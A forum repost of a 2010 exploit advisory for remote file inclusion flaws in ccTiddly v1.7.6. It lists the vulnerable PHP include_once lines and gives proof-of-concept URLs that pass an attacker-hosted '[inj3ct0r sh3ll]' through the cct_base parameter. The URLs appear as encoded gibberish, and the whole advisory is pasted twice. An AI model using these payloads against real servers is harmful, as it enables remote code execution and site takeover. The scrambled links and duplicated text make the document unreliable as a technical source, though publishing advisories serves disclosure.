-
-
[转帖]ccTiddly v1.7.6 Multiple Remote File Inclusion Vulnerabilities
-
发表于: 2010-8-7 16:06 2172
-
Developer: 12cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8A6k6r3c8D9P5i4N6A6K9$3W2Q4x3X3g2G2M7X3N6Q4x3V1k6%4K9h3E0A6i4K6u0r3b7$3y4f1K9h3c8V1L8s2W2p5k6i4k6W2L8r3!0H3k6i4u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
Download: e6eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8A6k6r3c8D9P5i4N6A6K9$3W2Q4x3X3g2G2M7X3N6Q4x3V1k6U0j5#2c8A6k6r3c8D9P5g2)9J5c8X3y4U0g2r3W2V1k6r3I4&6i4K6g2X3N6U0q4Q4x3X3f1%4i4K6u0W2y4W2)9J5k6i4A6A6M7q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
ccTiddly is a collaborative server side version of TiddlyWiki.
Note:
This is the same vuln in other lower version (c31K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3y4K6x3K6y4W2)9J5c8W2)9J5z5g2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
Vendor Not Fix the vulnerability in all folder !!!
================================================================
-=[Vuln C0de]=-
[!] path/includes/include.php
include_once($cct_base."includes/ccAssignments.php");
[!] path/includes/workspace.php
include_once($cct_base."includes/header.php");
include_once($cct_base."includes/user.php");
include_once($cct_base."includes/tiddler.php");
================================================================
-=[P0C]=-
67cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8Y4m8S2N6r3S2Q4x3V1k6A6L8X3y4D9N6h3c8W2M7#2)9J5c8X3W2F1j5$3I4#2k6r3g2Q4x3X3g2H3K9s2m8Q4x3@1k6U0j5%4c8Q4y4h3k6T1j5i4y4W2i4K6y4p5 [inj3ct0r sh3ll]
60dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8Y4m8S2N6r3S2Q4x3V1k6A6L8X3y4D9N6h3c8W2M7#2)9J5c8Y4N6G2M7X3E0K6M7r3q4U0k6g2)9J5k6i4m8Z5M7q4)9K6c8X3y4U0N6q4)9#2k6X3u0S2M7$3g2Q4x3@1b7`. [inj3ct0r sh3ll]
=========================| -=[ E0F ]=- |============================
Download: e6eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8A6k6r3c8D9P5i4N6A6K9$3W2Q4x3X3g2G2M7X3N6Q4x3V1k6U0j5#2c8A6k6r3c8D9P5g2)9J5c8X3y4U0g2r3W2V1k6r3I4&6i4K6g2X3N6U0q4Q4x3X3f1%4i4K6u0W2y4W2)9J5k6i4A6A6M7q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
ccTiddly is a collaborative server side version of TiddlyWiki.
Note:
This is the same vuln in other lower version (c31K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3y4K6x3K6y4W2)9J5c8W2)9J5z5g2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
Vendor Not Fix the vulnerability in all folder !!!
================================================================
-=[Vuln C0de]=-
[!] path/includes/include.php
include_once($cct_base."includes/ccAssignments.php");
[!] path/includes/workspace.php
include_once($cct_base."includes/header.php");
include_once($cct_base."includes/user.php");
include_once($cct_base."includes/tiddler.php");
================================================================
-=[P0C]=-
67cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8Y4m8S2N6r3S2Q4x3V1k6A6L8X3y4D9N6h3c8W2M7#2)9J5c8X3W2F1j5$3I4#2k6r3g2Q4x3X3g2H3K9s2m8Q4x3@1k6U0j5%4c8Q4y4h3k6T1j5i4y4W2i4K6y4p5 [inj3ct0r sh3ll]
60dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8Y4m8S2N6r3S2Q4x3V1k6A6L8X3y4D9N6h3c8W2M7#2)9J5c8Y4N6G2M7X3E0K6M7r3q4U0k6g2)9J5k6i4m8Z5M7q4)9K6c8X3y4U0N6q4)9#2k6X3u0S2M7$3g2Q4x3@1b7`. [inj3ct0r sh3ll]
=========================| -=[ E0F ]=- |============================
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
赞赏
雪币:
留言: